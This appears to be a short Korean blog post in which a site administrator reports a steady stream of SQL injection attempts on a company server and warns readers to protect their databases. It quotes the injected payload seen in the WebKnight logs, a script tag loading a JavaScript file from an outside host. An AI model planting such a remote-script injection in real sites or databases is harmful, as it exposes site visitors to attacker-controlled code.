스카리아풀빌라

최근 회사서버의 sql Injection 공격

IT/sql Injection
10월말부터 현재까지 계속해서 하나의 스크립트만 줄기차게 들어오고 있는중이네.
특정아이피부터 주소 모두 막고 있지만, 계속해서 들어오는게 장난이 아니네.
아래는 웹나이트 로그분석기 캡쳐이미지입니다.

타임을 보면 알겠지만, 거의 쉬지 않고 들어오는중입니다.
내용을 확인해보면, <sc ript src=http://s.ardoshanghai.com/s.js></scr ipt> 입니다.
구글에서 검색을 sql injection 공격을 받은 사이트가 무지 많네요.
모든분들 미리미리 예방을 하셔서 DB날리는 일이 없기를...